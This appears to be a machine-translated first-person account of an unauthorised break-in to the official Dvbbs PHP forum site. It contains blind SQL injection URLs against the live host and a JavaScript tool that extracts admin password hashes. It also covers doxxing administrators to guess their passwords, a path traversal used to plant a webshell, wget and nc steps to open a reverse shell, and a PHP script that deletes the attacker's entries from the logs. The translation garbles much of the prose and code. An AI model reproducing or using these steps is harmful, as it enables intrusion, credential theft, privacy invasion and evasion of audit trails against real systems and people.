Invasion took Dvbbs PHP website detailed process

A few months ago, Dvbbs php2.0 A can directly read out the Administrator password SQL injection vulnerability, when the loophole came out, I look at the heart itch, how there will be so retarded loopholes, Dvbbs php2.0 This set of code I have not looked carefully, so in mid-May I down a cursory look down, then I spent three days, take off p.dvbbs.net, that is, the official website of the web PHP, and got Webshell. Overall, the invasion was based on two-point technology plus a point of luck.
One, SQL injection vulnerability:
Night to check for a long time, Finally found in the topicother.php a SQL injection vulnerability, but not as simple as the previous time bursts of vulnerability, because the password can not be read directly out of the database and displayed, this is an active post registration main function, I simply searched the next, 1.0 seems to have added this feature later. OK, here's a look at the specific function:
function Postactive_main () {
......
$TopicID = $GLOBALS [' id '];
$activeid = Trim ($_get[' Activeid ');//activeid is not filtered
$timemode = $_post[' payment ');
$systemmode = Trim ($_post[' contact ');
$message = Trim ($_post[' message ');
$gettimemode = Trim ($_post[' timemode ');
$getstarttime = Trim ($_post[' starttime ');
$getendtime = Trim ($_post[' endtime ');
$getexpiretime = Trim ($_post[' expiretime ');
if ($timemode ==0)
$costnum = 0;
Else
$costnum = Intval (Trim ($_post[' payvalue '));
brought it in directly.
if ($query = $db->query ("select U1.sex,u1.strength,u2.usersex from {$dv}active as u1,{$dv}user as U2 WHERE Activeid ={$activeid} ")) {
$activeinfo =& $db->fetch_array ($query);
if (!empty ($activeinfo)) {
$db->free_result ($query);
}
}
if ($num = $db->query ("SELECT count (*) as num from {$DV}activeuser where activeid= '". $activeid. "") {
$activenum = $db->fetch_array ($num);
if (!empty ($activenum)) {
$db->free_result ($num);
}
}
...
If the Activeid is incorrect or the condition after injection is not established, the display str1: Sorry! The number of participants in this event is full!
if ($activenum [' num ']>= $activeinfo [' strength ']) {
Head (0,0,0, $arrNavMenu);
ShowMsg ($lang [' active_error.str1 ']);
Exit
}
If the Activeid is correct (after the injection of the condition is also established), but did not log in, the display str2: Please log on after the operation!
if ($userid ==0) {
Head (0,0,0, $arrNavMenu);
ShowMsg ($lang [' active_error.str2 ']);
Exit
}
...
If the Activeid is correct and has landed, the submission of the time did not submit the contact information, it will show STR6 this error: Sorry, the contact cannot be empty or less than 8 characters!
if ("' = = $systemmode | | Strlen ($systemmode)
First determine whether there is a Activeid 1 active post, is in the forum directory after adding
Topicother.php?t=9&action=join&activeid=1
Show "I'm sorry! The number of participants in this event is full!" Then there may not exist, the registration number of their own to send an active post first.
According to the above explanation, whether you have seen how to inject, not all need tools, I would like to access the manual injection is not injected, judge the condition is correct return to normal, error is not normal display; Here is not the same reason, whether or not landed, error shows: "Sorry! The number of participants in this event is full! ", if the condition is correct, do not log in the words show:" Please log on after the operation! ", has logged on the display:" Sorry contact cannot be empty or less than 8 characters! " So that night I manually tested the official, and successfully obtained an administrator's 16-bit MD5 password. Excited to go to bed, lying in bed but how can not sleep: How to more simple use it? While thinking, sleeping, and sleeping when the day is bright.
5 hours later, woke up to continue to engage, because did not develop that kind of application program experience, so I do not want to write an exp tool, but has been manual more trouble Ah, remember the previous development site with Ajax to get or post data and Echo, here is not the same can? So I try to write, and easily write a single judgment MD5 a bit of Ajax code, but in the writing loop when the error, and then flyh4t on the line to drop me a piece of code, I refer to a bit and then a can read any Dvbbs PHP site administrator password based on the page exploit Code's done. (List the main code):
function SendCall (i,j,url,w,p) {
if (p== "temp") {P=url}
Background password, user name, associated foreground user name
Switch (parseint (w)) {
Case 0:url = P "/**/and/**/ascii (Mid (password," I ", 1)) =" J ")/**/";
Case 1:url = P "/**/and/**/ascii (Mid (username," I ", 1)) =" J ")/**/";
Case 2:url = P "/**/and/**/ascii (Mid (AddUser," I ", 1)) =" J ")/**/";
Front desk password, user name
Case 3:url = P "/**/and/**/ascii (Mid (UserPassword," I ", 1)) =" J ")/**/";
Case 4:url = P "/**/and/**/ascii (Mid (username," I ", 1)) =" J ")/**/";
}
if (window. ActiveXObject) {
XmlHttp = new ActiveXObject ("Microsoft.XMLHTTP");
} else if (window. XMLHttpRequest) {
XmlHttp = new XMLHttpRequest ();
Resolving cross-domain issues in FF
try{
Netscape.security.PrivilegeManager.enablePrivilege ("Universalbrowserread");
} catch (e) {
Alert ("Permission Universalbrowserread denied.");
}
}
Xmlhttp.onreadystatechange = function () {
if (xmlhttp.readystate = = 4 && xmlhttp.status ==200) {
var str = Xmlhttp.responsetext;
var Md5hash=document.getelementbyid ("Md5hash");
if (!str.match (/\u672c\u6d3b\u52a8\u62a5\u540d\u4eba\u6570\u5df2\u6ee1/)) {
pass = String.fromCharCode (j);
md5hash.innerhtml = pass;
j = 48;
I
}
else {
if (j = = 59&& (parseint (w) ==0| | parseint (w) ==3)) {j = 96;}
else {J;}
}
if (Pass.length >=) {alert ("exploitation successfull!. Admin MD5 Hash (or username): "Pass"; return true; }
SendCall (I,J,URL,W,P);
}
}
Xmlhttp.open (' GET ', url, true);
Xmlhttp.send (NULL);
}
The tool does not support Chinese user names, but it supports a combination of alphanumeric common symbols.
Then simple, first Judge Xia Guan network Backstage Administrator number:
Http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/10= (Select/**/count (*)/**/from/ **/dv_admin)
Then determine how much the background administrator ID is from:
http://p.dvbbs.net/topicother.php?/topicother.php?t=9&action=join&boardid=2&id=1&activeid=1/** /and/**/1= (Select/**/count (*)/**/from/**/dv_admin/**/where/**/id=1)
Then can be based on the background ID with the tool to use the password, speed is pretty fast, I will succeed in the background all the MD5 password,cmd5.com to run down, only run out of one, the other is not the found is to charge. To the front desk, found that the front desk can see the administrator only a few, it seems that the front desk does not appear as an administrator, but I also use the tool out of the front desk administrator's password, keep the backup, check the next, but also only successfully ran out of one.
Because of the dynamic network of the foreground and the background of the relationship between the administrator, so you can not use the management of the foreground password plus the administrator's background password to login backstage, the following code and database, the background table adduser This field is the corresponding foreground password. But in this way, I get the information can not be used, how to get a background permission, the presence of MD5 to inject the brilliance of the dim, no wonder the original loophole so simple can read password those Daniel did not put the official site down, the official station does not exist idiot administrator ah ...
Again to the afternoon, or no progress, I think is to give up or how to continue, to 126 mailbox ph4nt0m Some posts, I suddenly think of a method ...
Second, social engineering:
In fact, this is to let me complacent place, I feel no matter what technology, no social engineering to let people, and as long as with intentions, social engineering can be interpreted incisively and vividly. But I am very excited about this experience, I still can not write more, because it involves the privacy of the official many administrators, I just simple intrusion detection, and do not want to be the reference of the people with ulterior motives.
Simple to say: Because AddUser is Chinese, my tool is not violent, but I can use a statement to guess (the adduser hexadecimal processing is OK):
Http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/1= (Select/**/count (*)/**/from/* */dv_admin/**/where/**/adduser=0x............/**/and/**/id=..)
I use. Instead of omitting the hexadecimal user name, the following ID is omitted. In this way, I can easily guess the background of an ID corresponding to the foreground user name, so I found a few administrators as a breakthrough.
Because I have the front desk administrator privileges, so I looked up from the front desk of all administrators, super moderators and people can see the dynamic Network team of information, and collect wrapping to a TXT file, and then I go to Baidu and Google search these administrator's user name, collect some of their usual visit site and leave information: birthday, ID number, QQ number, phone number, mailbox, etc., and finally according to the information according to the MD5 password to guess the existence of the password, and finally more than the beginning of the blankly of the start much better, really not, I ran to the Dvbbs ASP forum to get relevant information, finally to the last afternoon The effort was not wasted, I took the Dvbbs PHP official website backstage at night:

Unusually excited, I gave flyh4t cut a figure to preach the next victory, and then ran to ph4nt0m sent a post to tell everyone the great social engineering (the result was the bull cattle despised ... Cold
Third, background cross-directory write file Vulnerability:
One day, I get backstage management authority, really very difficult, but the revolution is not over, haven't got Webshell it, but generally, get the background rights, Webshell not far away, FLYH4T said to write a template can be done, I don't worry about, first go to eat a meal ...
When I came back, I looked at the system in the background with syinfo.php?act=phpinfo, the typical lamp
(linux,apache,mysql,php) combination, it seems to be a lot of effort AH; I am prepared to write a PHP template according to conventional thinking, but the new template when the error:

Not 0777 permissions, write not in. What to do?
Backstage, see can find another breakthrough, but unfortunately, from the night turned to the early morning did not find a place to use, maybe Php backstage take Webshell method I do not know, has been accustomed to the station of the ASP, to PHP on the idea blocked, Baidu the next method, also did not find. Is the great revolution over?
Turned for a while, I actually in the template page below to see a building directory, but still do not have permission to build, Hey, Linux is trouble, if Windows is certainly not permissions so perverted, their station under normal circumstances can certainly write, think can write, I suddenly a bright, yes, This station can have a writable place ah, such as uploading pictures or files upload avatar, you need to write directory Ah, Linux permissions set although abnormal, but always leave a place to be, but the question is how can I use?
A lot of random attempts to build a directory or file after the failure (now recall how the error, I confused the directory with the English name), I decided not to blindly, read the source code, So I opened the admin in the template.php began to read, it does not matter, a read actually found can cross-directory to write the file of the vulnerability.
Random fill the path must be wrong, and the reason for the error is the Chinese name must be lost in Chinese name, English name does not matter, look at the code first:
if (!is_dir ($destfile)) {
if ($issafemode = Ini_get (' Safe_mode ')) {
Show_msg ($lang [' page_title '], Str_replace (' {$TPL _dir} ', $destfile, $lang [' tpl.error12 ']);
Footer ();
Exit
}
if (!mkdir ($destfile, 0777)) {
Show_msg ($lang [' page_title '], $lang [' Tpl.error4 ']);
Footer ();
Exit
}
}
It seems that $destfile is the key, and then look at what this variable is:
$destfile = Simplemappath ($_post[' add_directory '). ' /'. $_post[' Add_ename ');
There is a simplemappath in the filter Ah, no wonder, then look at this function:
function Simplemappath ($path)
{
Global $_server;
if (empty ($path)) {
return false;
}
$path = Preg_replace (' # (?: \ \ \ )| (?:/ ) #i ', '/', $path);
if ($path {0} = = = '/') {
$documentroot = Realpath (str_replace (' \ \ ', '/', $_server[' document_root '));
return $documentroot. $path;
} elseif (substr ($path, 0, 3) = = = ". /‘) {
return $path;
} else {
return Root_path. $path;
}
}
This part of the function I am a little silent, I can not see what he wants to filter ... Specifically wrote a PHP file to copy this function into the native test, can be written into the previous level of the directory.
Either absolute path or relative path can easily write a directory in UploadFile, and then write a template inside, edit, then get the Webshell. At this time the day is almost bright, want to sleep, but can't sleep, why not one go, take the system authority?
Iv. Power of failure:
Because of the failure to raise power, so this Part I also briefly skipped, although it took me half the time, but the level of bad AH. Administrator permissions to give too perverted, in addition to UploadFile, all other directories are not writable ... Anyway, there is a place to write, first check the server version, enter Uname-a;id, return:
Linux p.dvbbs.net 2.6.9-5.elsmp #1 SMP Wed Jan 5 19:30:39 EST 2005 i686 i686 i386 Gnu/linux
uid=2 (daemon) gid=2 (daemon) Groups=1 (BIN), 2 (daemon), 4 (ADM), 7 (LP)
Check the next Perl, wget, are installed, so wget a comeback.pl, and then with the NC rebound, but also successfully rebound back to the local shell, thought so smooth ah, next is to mention the right, But turned over the milw0rm.com, to find a variety of rights to use the program, is not a successful, I Baidu Google has been n long, online about the rights of the article on Linux very little, some basic is a kind, rebound and then right, But we can easily mention the power of the prtcl.c here to it helpless ...
To the afternoon is too sleepy to sleep for a while, wake up to continue to engage, but finally ended up with a failure, and put it server overflow hanging, I hurriedly close hand, hey, I too food, do not do bad things, leave a page memorial:

Five, cleaning residue:
Linux residue I have no way, did not mention the right to succeed, the authority is too small, but the site left to the things must be cleaned out. So write a clear.php:
Define (' Isdvbbs ', TRUE);
Require '. /inc/config.php ';
Require '. /inc/dv_clssql.php ';
$db = new Sqldb ();
Defined (' Dv_muf_db_host ') and ($dbhost = Dv_muf_db_host);
$db->connect ($dbhost, $dbuser, $DBPW, $dbname, $charset, $pconnect);
Clear my new template
$db->query ("DELETE from dv_styles WHERE name= ' ah ah ah '");
Clear my IP background operation log
$db->query ("DELETE from Dv_log WHERE l_ip= ' 58.213.51.65 '");
echo "ok!";
?>
Upload to UploadFile inside, browser run, so OK ...

Invasion took Dvbbs PHP website detailed process (figure)